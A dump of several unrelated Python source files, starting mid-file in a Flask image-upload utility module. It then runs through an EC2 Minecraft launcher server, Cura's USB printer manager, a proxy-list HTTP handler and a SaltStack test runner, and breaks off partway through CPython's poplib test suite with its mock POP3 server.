if splitext(filename)[-1] in _allowed_exts:
return filename
class JsonResponse(Response):
@classmethod
def force_type(cls, rv, environ=None):
if isinstance(rv, dict):
rv = jsonify(rv)
return super(JsonResponse, cls).force_type(rv, environ)
class FormFileStorage(object):
"""通过表单上传文件"""
def __init__(self, fp):
self._fp = fp
self._filename = None
self._tmppath = None
self._stream = None
self._size = 0
self.__parse()
def __parse(self):
if self._fp:
self._filename = self._fp.filename
with NamedTemporaryFile(prefix="sapic", delete=False) as fp:
self._tmppath = fp.name
self._fp.save(fp.name)
self._size = getsize(self._tmppath)
with open(self._tmppath, "rb") as fp:
self._stream = BytesIO(fp.read())
remove(self._tmppath)
@property
def mimetype(self):
if self._fp:
return self._fp.mimetype
@property
def filename(self):
return self._filename
@property
def stream(self):
return self._stream
@property
def size(self):
"""return bytes"""
return self._size
def __bool__(self):
return bool(self._filename)
def __repr__(self):
return "<%s: %r (%d)>" % (
self.__class__.__name__,
self._filename,
self._size,
)
class Base64FileStorage(object):
"""上传接口中接受base64编码的图片。
允许来自前端的Data URI形式:
https://developer.mozilla.org/docs/Web/HTTP/data_URIs
"""
def __init__(self, b64str, filename=None):
self._filename = filename
#: data uri scheme
self._b64str = self.__set_data_uri(b64str)
self._parse = parse_data_uri(self._b64str)
if self.is_base64:
try:
#: now data change to binary
self._parse["data"] = pic64decode(self._parse.data)
except (BaseDecodeError, TypeError, ValueError):
raise ValueError("The attempt to decode the image failed")
else:
raise ValueError("Not found base64")
def __set_data_uri(self, b64str):
if not PY2 and not isinstance(b64str, text_type):
b64str = b64str.decode("utf-8")
if not b64str.startswith("data:"):
b64str = "data:;base64,%s" % b64str
return b64str
@property
def mimetype(self):
return self._parse.mimetype
@property
def filename(self):
if not self._filename:
ext = imghdr.what(None, self._parse.data)
if not ext and self.mimetype:
mType, sType = self.mimetype.split("/")
if mType == "image": # without parse video
ext = sType
self._filename = "{}.{}".format(get_current_timestamp(), ext)
return self._filename
@property
def is_base64(self):
return self._parse.is_base64
@property
def stream(self):
if self.is_base64:
return BytesIO(self._parse.data)
@property
def size(self):
"""return bytes"""
if self.is_base64:
return b64size(self._b64str)
def __bool__(self):
return self.is_base64
class ImgUrlFileStorage(object):
"""上传接口中接受远程图片地址,会自动调用代理下载图片。"""
def __init__(self, imgurl, filename=None):
self._imgurl = imgurl
self._filename = filename
self._allowed_exts = [".{}".format(e) for e in get_allowed_suffix()]
self._imgobj = self.__download()
@property
def Headers(self):
return {"User-Agent": gen_ua()}
def __download(self):
if self._imgurl and url_pat.match(self._imgurl):
try:
resp = try_proxy_request(
self._imgurl,
method="get",
headers=self.Headers,
timeout=30,
)
resp.raise_for_status()
except (RequestException, Exception) as e:
logger.debug(e, exc_info=True)
else:
mime = resp.headers["Content-Type"].split("/")[0]
if mime in ("image", "video"):
return resp
@property
def filename(self):
"""定义url图片文件名:
如果给定文件名,则用,否则从url path猜测。
猜测失败,从url query查找filename参数。
未果,则读取图片二进制猜测格式。
未果,从返回标头Content-Type判断。
未果,文件名后缀可能是None,将不合要求。
"""
if not self._filename and self._imgobj:
ufn = guess_filename_from_url(self._imgobj.url, self._allowed_exts)
if ufn and splitext(ufn)[-1] in self._allowed_exts:
self._filename = ufn
return ufn
ext = imghdr.what(None, self._imgobj.content)
if not ext:
mType, sType = self._imgobj.headers["Content-Type"].split("/")
if mType in ("image", "video"):
ext = sType
self._filename = "{}.{}".format(get_current_timestamp(), ext)
return self._filename
@property
def stream(self):
if self._imgobj:
return BytesIO(self._imgobj.content)
@property
def getObj(self):
f = self.filename
if f and splitext(f)[-1] in self._allowed_exts:
return self if self._imgobj else None
@property
def size(self):
"""return bytes"""
if self._imgobj:
return int(self._imgobj.headers.get("Content-Length", 0))
def __bool__(self):
return True if self._imgobj else False
def get_upload_method(class_name):
if class_name in ("FileStorage", "FormFileStorage"):
return "file"
elif class_name == "ImgUrlFileStorage":
return "url"
elif class_name == "Base64FileStorage":
return "base64"
else:
return "unknown"
def _pip_install(pkg, index=None, upgrade=None):
"""使用pip安装模块到用户目录$HOME/.local"""
cmd = [executable, "-m", "pip", "install", "-q"]
if not is_venv():
cmd.append("--user")
if upgrade:
cmd.append("-U")
if index:
cmd.extend(["-i", index])
cmd.append(pkg)
retcode = call(cmd)
if retcode == 0:
set_page_msg(pkg + " 安装成功", "success")
_pip_list(no_fresh=False)
else:
set_page_msg(pkg + " 安装失败", "warn")
logger.info("{}, retcode: {}".format(" ".join(cmd), retcode))
def _pip_list(fmt=None, no_fresh=True):
"""获取pip list的JSON结果"""
key = rsp("cache", "piplist")
data = rc.get(key)
if is_true(no_fresh) and data:
data = json.loads(data)
else:
cmd = [executable, "-m", "pip", "list", "--format", "json"]
data = json.loads(check_output(cmd))
pipe = rc.pipeline()
pipe.set(key, json.dumps(data))
pipe.expire(key, 3600)
pipe.execute()
if fmt == "dict":
return {n["name"]: n for n in data}
else:
return data
def generate_activate_token(dump_data, max_age=600):
if dump_data and isinstance(dump_data, dict):
s = Serializer(current_app.config["SECRET_KEY"], expires_in=max_age)
data = s.dumps(dump_data)
return data.decode()
def check_activate_token(token):
res = dict(code=400)
if token:
s = Serializer(current_app.config["SECRET_KEY"])
try:
data = s.loads(token)
except SignatureExpired:
res.update(code=403, msg="expired token")
except BadSignature:
res.update(code=404, msg="useless token")
else:
res.update(code=0, data=data)
else:
res.update(msg="Parameter error")
return res
def sendmail(subject, message, to):
"""调用钩子中发送邮件函数(任意钩子发送成功即停止),要求用于Web上下文环境
:param str subject: 主题
:param str message: 正文(支持HTML)
:param str to: 收件人,可用逗号添加多个
"""
res = dict(code=1)
if subject and message and to and check_to_addr(to):
to = ",".join(parse_valid_comma(to))
data = current_app.extensions["hookmanager"].call(
_funcname="sendmail",
_mode="any_true",
_args=(subject, message, to),
)
logger.debug(data)
if is_all_fail(data):
res.update(msg="Email send failed", errors=data)
return res
else:
res.update(code=0)
else:
res.update(msg="Parameter error")
return res
def async_sendmail(subject, message, to):
"""异步邮件发送,可用于多线程及非Web上下文环境"""
def send_async_email(app):
with app.test_request_context():
app.preprocess_request()
sendmail(subject, message, to)
app = current_app._get_current_object()
t = Thread(target=send_async_email, args=[app])
t.start()
def make_email_tpl(tpl, **data):
"""制作邮件模板
:param tpl: 模板文件(位于templates/email/下)
:keyword data: 模板所用变量
:returns: jinja2渲染好的html内容
"""
je = Environment(
loader=FileSystemLoader(
pathjoin(current_app.root_path, current_app.template_folder, "email")
)
)
if "site_name" not in data:
data["site_name"] = g.site_name
if "url_root" not in data:
data["url_root"] = request.url_root
if "username" not in data:
data["username"] = g.userinfo.nickname or g.userinfo.username
return je.get_template(tpl).render(data)
def try_proxy_request(url, **kwargs):
"""自动调用代理服务的try_request
:param str url: 请求地址
:keyword kwars: :func:`utils.tool.try_request` 要求的其他参数
.. versionadded:: 1.9.0
"""
kwargs["proxy"] = (
dict(
[ps.split("=") for ps in comma_pat.split(g.cfg.proxies) if ps and "=" in ps]
)
if g.cfg.proxies
else None
)
return try_request(url, **kwargs)
def set_page_msg(text, level="info"):
"""给管理员的控制台消息(任意环境均可)
:param str text: 消息内容
:param str level: 级别,info(默认)、success、error、warn
.. versionadded:: 1.9.0
"""
levels = dict(info=-1, warn=0, success=1, error=2)
if text and level in levels.keys():
return rc.rpush(
rsp("msg", "admin", "control"),
json.dumps(dict(text=text, icon=levels[level])),
)
def get_page_msg():
"""生成消息Js,仅在管理员控制台页面闪现消息(仅Web环境调用)"""
key = rsp("msg", "admin", "control")
msgs = rc.lrange(key, 0, -1)
if msgs:
def tpl_plus(total, new):
return total % new
def make_layer(msg):
return (
(
'layer.alert("@1",{icon:@2,offset:"rt",shade:0,'
'title:false,btn:"我知道了",btnAlign:"c",closeBtn:0},'
"function(index){layer.close(index);%s});"
)
.replace("@1", msg["text"])
.replace("@2", str(msg["icon"]))
)
html = (
"<script>",
reduce(tpl_plus, map(make_layer, [json.loads(i) for i in msgs])) % "",
"</script>",
)
rc.delete(key)
return Markup("".join(html))
else:
return ""
def push_user_msg(to, text, level="info", time=3, align="right"):
"""给用户推送消息(任意环境均可)
:param str to: 用户名
:param str text: 消息内容
:param str level: 级别,info(默认)、success、error、warn
:param int time: 超时时间,单位秒
:param str align: 消息显示位置,right右上角、center顶部中间、left左上角
.. versionadded:: 1.10.0
"""
if (
to
and text
and level in ("info", "warn", "success", "error")
and isinstance(time, int)
and align in ("left", "center", "right")
):
if rc.exists(rsp("account", to)):
return rc.rpush(
rsp("msg", to),
json.dumps(dict(text=text, level=level, time=time * 1000, align=align)),
)
def get_push_msg():
"""生成消息Js,仅在个人中心页面闪现消息(仅Web环境调用)"""
key = rsp("msg", g.userinfo.username)
msgs = rc.lrange(key, 0, -1)
if msgs:
def make_layer(data):
return ('message.push("{text}","{level}","{align}",{time});').format(
text=data["text"],
level=data["level"],
align=data["align"],
time=int(data["time"]),
)
html = (
"<script>"
'layui.use("message",function(){var message = layui.message;%s});'
"</script>"
) % "".join(map(make_layer, [json.loads(i) for i in msgs]))
rc.delete(key)
return Markup(html)
else:
return ""
def get_user_ip():
"""首先从HTTP标头的X-Forwarded-For获取代理IP,其次获取X-Real-IP,最后是客户端IP"""
ip = None
if request.headers.get("X-Forwarded-For"):
ip = request.headers["X-Forwarded-For"]
elif request.headers.get("X-Real-IP"):
ip = request.headers.get("X-Real-IP")
else:
ip = request.remote_addr
return ip or ""
def has_image(sha):
"""是否存在图片"""
gk = rsp("index", "global")
ik = rsp("image", sha)
pipe = rc.pipeline()
pipe.sismember(gk, sha)
pipe.exists(ik)
result = pipe.execute()
return result == [True, 1]
def get_allowed_suffix():
"""获取允许上传的后缀(允许视频,后缀无点)"""
allowed = parse_valid_verticaline(g.cfg.upload_exts) or ALLOWED_EXTS
if is_true(g.cfg.upload_video):
allowed += ALLOWED_VIDEO
return allowed
def allowed_suffix(filename):
"""判断filename是否匹配控制台配置的上传后缀(及默认)
:param str filename: 图片文件名
:rtype: boolean
.. versionadded:: 1.10.0
"""
return partial(allowed_file, suffix=get_allowed_suffix())(filename)
def up_size_limit():
limit = current_app.config["MAX_UPLOAD"]
up_size = g.cfg.upload_size
if up_size:
try:
up_size = int(up_size)
except (ValueError, TypeError):
pass
else:
limit = up_size
return limit * 1024 * 1024
|
server.py
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS, cross_origin
from multiprocessing import Process
from configuration import Config
import json
import boto3
import time
import paramiko
import os
app = Flask(__name__)
CORS(app)
#Paraminko ssh information
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, Config.SSH_KEY_FILE_PATH)
key = paramiko.RSAKey.from_private_key_file(filename)
sshClient = paramiko.SSHClient()
sshClient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#Waits for the server to reach a valid state so that commands can be executed on the server
def serverWaitOk(instanceIp, client):
checksPassed = False
status = 'initializing'
instanceIds=[Config.INSTANCE_ID]
while (not checksPassed) and (status == 'initializing'):
statusCheckResponse = client.describe_instance_status(InstanceIds = instanceIds)
instanceStatuses = statusCheckResponse['InstanceStatuses']
instanceStatus = instanceStatuses[0]
instanceStatus = instanceStatus['InstanceStatus']
status = instanceStatus['Status']
checksPassed = status == 'ok'
time.sleep(5)
if checksPassed:
initServerCommands(instanceIp)
else:
print('An error has occured booting the server')
#SSH connects to server and executes command to boot minecraft server
def initServerCommands(instanceIp):
# Connect/ssh to an instance
try:
# Here 'ubuntu' is user name and 'instance_ip' is public IP of EC2
sshClient.connect(hostname=instanceIp, username="ubuntu", pkey=key)
# Execute a command(cmd) after connecting/ssh to an instance
stdin, stdout, stderr = sshClient.exec_command(
"screen -dmS minecraft bash -c 'sudo java -Xmx1024M -Xms1024M -jar"
" ./OnDemandMinecraft/server.jar nogui'"
)
print("COMMAND EXECUTED")
# close the client connection once the job is done
sshClient.close()
except:
print('Error running server commands')
#Main endpoint for loading the webpage
@app.route('/')
def loadIndex():
return render_template('index.html')
@app.route('/initServerMC', methods = ['POST'])
def initServerMC():
inputPass = request.form['pass']
returnData = {}
if inputPass == Config.SERVER_PASSWORD:
#Instantiate server here or return ip address if already running
client = boto3.client(
'ec2',
aws_access_key_id=Config.ACCESS_KEY,
aws_secret_access_key=Config.SECRET_KEY,
region_name=Config.ec2_region
)
ipAddress = manageServer(client)
returnData['ip'] = ipAddress
returnData['success'] = True
else:
returnData['success'] = False
print("\nFINAL RETURN VALUE\n")
print(str(returnData))
print("\n")
return json.dumps(returnData)
#Gets IP Address for return to webpage otherwise boots server
def manageServer(client):
returnString = 'ERROR'
instanceIds = [Config.INSTANCE_ID]
response = client.describe_instances(InstanceIds = instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
print("\nSERVER INSTANCES\n")
print(instances)
print("\n")
if len(instances) > 0:
instance = instances[0]
state = instance['State']
stateName = state['Name']
if (stateName == 'stopped') or (stateName == 'shutting-down'):
#SETUP MULTIPROCESSING HERE INSTEAD OF REDIS
returnString = startServer(client)
elif stateName == 'running':
returnString = 'IP: ' + instance['PublicIpAddress']
else:
returnString = 'ERROR'
return returnString
#Starts the specified AWS Instance from the configuration
def startServer(client):
#Gets proper variables to attempt to instantiate EC2 instance and start minecraft server
returnString = 'ERROR'
instanceIds = [Config.INSTANCE_ID]
response = client.start_instances(InstanceIds = instanceIds)
stateCode = 0
while not (stateCode == 16):
time.sleep(3)
print('\nAWS EC2 START RESPONSE\n')
print(str(response))
print('\n')
response = client.describe_instances(InstanceIds = instanceIds)
reservations = response['Reservations']
reservation = reservations[0]
instances = reservation['Instances']
instance = instances[0]
state = instance['State']
stateCode = state['Code']
print("\nSERVER INSTANCES\n")
print(instances)
print("\n")
ipAddress = instance['PublicIpAddress']
returnString = 'Server is starting, this may take a few minutes.\nIP: ' + ipAddress
#SETUP MULTIPROCESSING HERE INSTEAD OF REDIS
p = Process(target=serverWaitOk, args=(ipAddress, client))
p.start()
return returnString
|
USBPrinterOutputDeviceManager.py
|
# Copyright (c) 2018 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.
import threading
import time
import serial.tools.list_ports
from os import environ
from re import search
from PyQt5.QtCore import QObject, pyqtSignal
from UM.Signal import Signal, signalemitter
from UM.OutputDevice.OutputDevicePlugin import OutputDevicePlugin
from UM.i18n import i18nCatalog
from cura.PrinterOutput.PrinterOutputDevice import ConnectionState
from . import USBPrinterOutputDevice
i18n_catalog = i18nCatalog("cura")
## Manager class that ensures that an USBPrinterOutput device is created for every connected USB printer.
@signalemitter
class USBPrinterOutputDeviceManager(QObject, OutputDevicePlugin):
addUSBOutputDeviceSignal = Signal()
progressChanged = pyqtSignal()
def __init__(self, application, parent = None):
if USBPrinterOutputDeviceManager.__instance is not None:
raise RuntimeError("Try to create singleton '%s' more than once" % self.__class__.__name__)
USBPrinterOutputDeviceManager.__instance = self
super().__init__(parent = parent)
self._application = application
self._serial_port_list = []
self._usb_output_devices = {}
self._usb_output_devices_model = None
self._update_thread = threading.Thread(target = self._updateThread)
self._update_thread.setDaemon(True)
self._check_updates = True
self._application.applicationShuttingDown.connect(self.stop)
# Because the model needs to be created in the same thread as the QMLEngine, we use a signal.
self.addUSBOutputDeviceSignal.connect(self.addOutputDevice)
self._application.globalContainerStackChanged.connect(self.updateUSBPrinterOutputDevices)
# The method updates/reset the USB settings for all connected USB devices
def updateUSBPrinterOutputDevices(self):
for key, device in self._usb_output_devices.items():
if isinstance(device, USBPrinterOutputDevice.USBPrinterOutputDevice):
device.resetDeviceSettings()
def start(self):
self._check_updates = True
self._update_thread.start()
def stop(self, store_data: bool = True):
self._check_updates = False
def _onConnectionStateChanged(self, serial_port):
if serial_port not in self._usb_output_devices:
return
changed_device = self._usb_output_devices[serial_port]
if changed_device.connectionState == ConnectionState.Connected:
self.getOutputDeviceManager().addOutputDevice(changed_device)
else:
self.getOutputDeviceManager().removeOutputDevice(serial_port)
def _updateThread(self):
while self._check_updates:
container_stack = self._application.getGlobalContainerStack()
if container_stack is None:
time.sleep(5)
continue
port_list = [] # Just an empty list; all USB devices will be removed.
if container_stack.getMetaDataEntry("supports_usb_connection"):
machine_file_formats = [file_type.strip() for file_type in container_stack.getMetaDataEntry("file_formats").split(";")]
if "text/x-gcode" in machine_file_formats:
port_list = self.getSerialPortList(only_list_usb=True)
self._addRemovePorts(port_list)
time.sleep(5)
## Helper to identify serial ports (and scan for them)
def _addRemovePorts(self, serial_ports):
# First, find and add all new or changed keys
for serial_port in list(serial_ports):
if serial_port not in self._serial_port_list:
self.addUSBOutputDeviceSignal.emit(serial_port) # Hack to ensure its created in main thread
continue
self._serial_port_list = list(serial_ports)
for port, device in self._usb_output_devices.items():
if port not in self._serial_port_list:
device.close()
## Because the model needs to be created in the same thread as the QMLEngine, we use a signal.
def addOutputDevice(self, serial_port):
device = USBPrinterOutputDevice.USBPrinterOutputDevice(serial_port)
device.connectionStateChanged.connect(self._onConnectionStateChanged)
self._usb_output_devices[serial_port] = device
device.connect()
## Create a list of serial ports on the system.
# \param only_list_usb If true, only usb ports are listed
def getSerialPortList(self, only_list_usb = False):
base_list = []
for port in serial.tools.list_ports.comports():
if not isinstance(port, tuple):
port = (port.device, port.description, port.hwid)
if only_list_usb and not port[2].startswith("USB"):
continue
# To prevent cura from messing with serial ports of other devices,
# filter by regular expressions passed in as environment variables.
# Get possible patterns with python3 -m serial.tools.list_ports -v
# set CURA_DEVICENAMES=USB[1-9] -> e.g. not matching /dev/ttyUSB0
pattern = environ.get('CURA_DEVICENAMES')
if pattern and not search(pattern, port[0]):
continue
# set CURA_DEVICETYPES=CP2102 -> match a type of serial converter
pattern = environ.get('CURA_DEVICETYPES')
if pattern and not search(pattern, port[1]):
continue
# set CURA_DEVICEINFOS=LOCATION=2-1.4 -> match a physical port
# set CURA_DEVICEINFOS=VID:PID=10C4:EA60 -> match a vendor:product
pattern = environ.get('CURA_DEVICEINFOS')
if pattern and not search(pattern, port[2]):
continue
base_list += [port[0]]
return list(base_list)
__instance = None # type: USBPrinterOutputDeviceManager
@classmethod
def getInstance(cls, *args, **kwargs) -> "USBPrinterOutputDeviceManager":
return cls.__instance
|
proxiesmanager.py
|
from config import CONFIG
from http.server import BaseHTTPRequestHandler, HTTPServer
from proxyset import ProxySet
import threading
class ProxiesManager:
def __init__(self, proxyset: ProxySet):
class ProxyModifyRequestHandler(BaseHTTPRequestHandler):
def do_PUT(self):
try:
with open('proxies.txt') as f:
proxyset.renew_proxies({line.rstrip('\n') for line in f})
except Exception as e:
self.send_response(500)
self.end_headers()
self.wfile.write(str(e).encode('utf-8'))
return
self.send_response(200)
self.end_headers()
def do_POST(self):
self.send_response(200)
self.end_headers()
for proxy in proxyset.get_blocked_proxies():
self.wfile.write(proxy.encode('utf-8'))
self.wfile.write(b'\n')
def do_GET(self):
self.send_response(200)
self.end_headers()
for proxy in proxyset.get_avail_proxies():
self.wfile.write(proxy.encode('utf-8'))
self.wfile.write(b'\n')
self.handler = ProxyModifyRequestHandler
def start(self):
httpd = HTTPServer((CONFIG['server_address'], CONFIG['server_port']), self.handler)
threading.Thread(target=lambda: httpd.serve_forever(), daemon=True).start()
|
mc_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
'''
.. _module_mc_test:
mc_test
===============================================
'''
import threading
import time
import Queue
import os
import traceback
import salt.exceptions
import salt.output
from salt.utils.odict import OrderedDict
from mc_states import api
from mc_states import saltapi
from mc_states.tests import utils
class TestError(salt.exceptions.SaltException):
"""."""
def _error(msg, ret=None):
return saltapi.rich_error(TestError, msg, ret)
def froot():
return __opts__['file_roots']['base'][0]
def mroot():
return os.path.join(froot(), 'makina-states')
def lint_tests(use_vt=True, logcapture=True):
try:
result = __salt__['cmd.run_all'](
'_scripts/pylint.sh -f colorized mc_states',
use_vt=use_vt, cwd=mroot())
if result['retcode']:
raise _error('Pylint tests failed', result)
except salt.exceptions.CommandExecutionError:
trace = traceback.format_exc()
raise _error('Problem with pylint install:\n {0}'.format(
api.magicstring(trace)))
def unit_tests(tests=None,
coverage=True,
doctests=True,
use_vt=True,
logcapture=True):
in_args = '--exe -e mc_test -v -s'
if not logcapture:
in_args += ' --nologcapture'
if isinstance(tests, basestring):
tests = tests.split(',')
if not tests:
tests = ['mc_states']
if coverage:
in_args += (' --with-xcoverage'
' --xcoverage-file=.coverage.xml')
if doctests:
in_args += ' --with-doctest'
failed = OrderedDict()
success = OrderedDict()
for test in tests:
try:
cmd = 'bin/nosetests {0} {1}'.format(
in_args, test)
result = __salt__['cmd.run_all'](
cmd,
output_loglevel='debug',
use_vt=use_vt, cwd=mroot())
if result['retcode']:
failed[test] = result
else:
success[test] = result
except salt.exceptions.CommandExecutionError:
trace = traceback.format_exc()
raise _error('Problem with nose install:\n {0}'.format(
api.magicstring(trace)))
if failed:
fail = failed.pop([a for a in failed][0])
for ffail in failed:
fail = saltapi.concat_res_or_rets(fail, ffail)
raise _error('Doctest tests failed', fail)
return success
def _echo(inq, outq):
stop = False
while not stop:
try:
test = inq.get_nowait() == 'STOP'
if test:
print('OK baby, finished !')
stop = True
continue
except Queue.Empty:
pass
if int(time.time()) % 50 == 0:
print('STATUS ECHO running...')
time.sleep(1)
def run_tests(flavors=None, use_vt=True, echo=False, logcapture=True):
if not flavors:
flavors = []
if isinstance(flavors, basestring):
flavors = flavors.split(',') # pylint: disable=E1101
success = OrderedDict()
failures = OrderedDict()
# for step in ['lint', 'unit']:
if echo:
inq = Queue.Queue()
outq = Queue.Queue()
pr = threading.Thread(target=_echo, args=(inq, outq))
pr.start()
for step in ['unit']:
try:
utils.test_setup()
success[step] = __salt__['mc_test.{0}_tests'.format(
step)](use_vt=use_vt, logcapture=logcapture)
except (TestError,) as exc:
failures[step] = exc
except (Exception, KeyboardInterrupt):
failures[step] = traceback.format_exc()
break
finally:
utils.test_teardown()
if echo:
inq.put('STOP')
pr.join()
# for now, lint is not a failure
acceptables = ['lint']
for i in acceptables:
failures.pop(i, None)
if failures:
_failures = dict([(a, "{0}".format(failures[a])) for a in failures])
salt.output.display_output(_failures, opts=__opts__)
raise TestError('test failure => non 0 exit code')
# if no failure, be sure not to mark retcode as a failure
__context__['retcode'] = 0
return success
def run_travis_tests(use_vt=False, echo=True, logcapture=False):
use_vt = True
return run_tests(
'travis', use_vt=use_vt, echo=echo, logcapture=logcapture)
# vim:set et sts=4 ts=4 tw=80:
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import time
import errno
from unittest import TestCase
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' %(arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port, timeout=3)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert.pem")
class DummyPOP3_SSLHandler(DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
ssl_socket = ssl.wrap_socket(self.socket, certfile=CERTFILE,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(ssl_socket)
# Must try handshake before calling push()
self._ssl_accepting = True
self._do_ssl_handshake()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
DummyPOP3Handler.handle_read(self)
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
